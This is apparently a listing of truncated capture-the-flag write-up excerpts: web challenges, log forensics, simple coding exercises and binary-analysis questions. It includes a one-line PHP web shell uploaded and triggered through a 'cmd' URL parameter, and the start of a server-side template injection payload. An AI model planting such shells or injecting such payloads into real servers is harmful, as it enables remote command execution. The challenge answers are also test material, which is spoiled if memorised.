CHALLENGE DESCRIPTION SOLUTION Upload our payload <?php system($_GET["cmd"]); ?> We can see that our file is located at /uploads/[file] Now we inject to the URL /uploads/[file].php?cmd=s...

CHALLENGE DESCRIPTION SOLUTION SSTI1 As we know it has SSTI vulnerability, we can try this $ and we get the respond $7777777. Now input our payload: {request.application.__globals__.__builtins__...

Writeup ** Q1: Analyze the auth.log. What is the IP address used by the attacker to carry out a brute force attack?** We need to look for failure attempt Search for cat auth.log | grep "Failed pa...

DESCRIPTION Take in two numbers, a and b. Return a+b. Example Input: 3 4 Output: 7 SOLUTION a, b = int(input()), int(input()) print(a + b)

DESCRIPTION Take in a string. Print the reverse. Example Input: Test me Output: em tseT SOLUTION n = (input()) print(n[::-1])

DESCRIPTION Take in a number, print “odd” if odd and “even” if even. Example Input: 3 Output: odd SOLUTION n = int(input()) print("odd" if n % 2 != 0 else "even")

DESCRIPTION SOLUTION def evaluate_polynomial(coefficients, x): result = 0 for i, coeff in enumerate(coefficients): result += coeff * (x ** i) return result # Read input coeff...

SOLUTION Using BinaryNinja to analyze the code, we can see the main function here. What we need to do is convert the hex to decimal and get the flag.

SOLUTION Q1: What is the file format of the executable? Q2: What is the CPU architecture of the executable? Q3: What library is used to read lines for user answers? (ldd may help) Using BinaryNi...

SOLUTION By analyzing the code, we can see this. public function getfacts($router) { $jsondata = json_decode(file_get_contents('php://input'), true); if ( empty($jsondata) ||...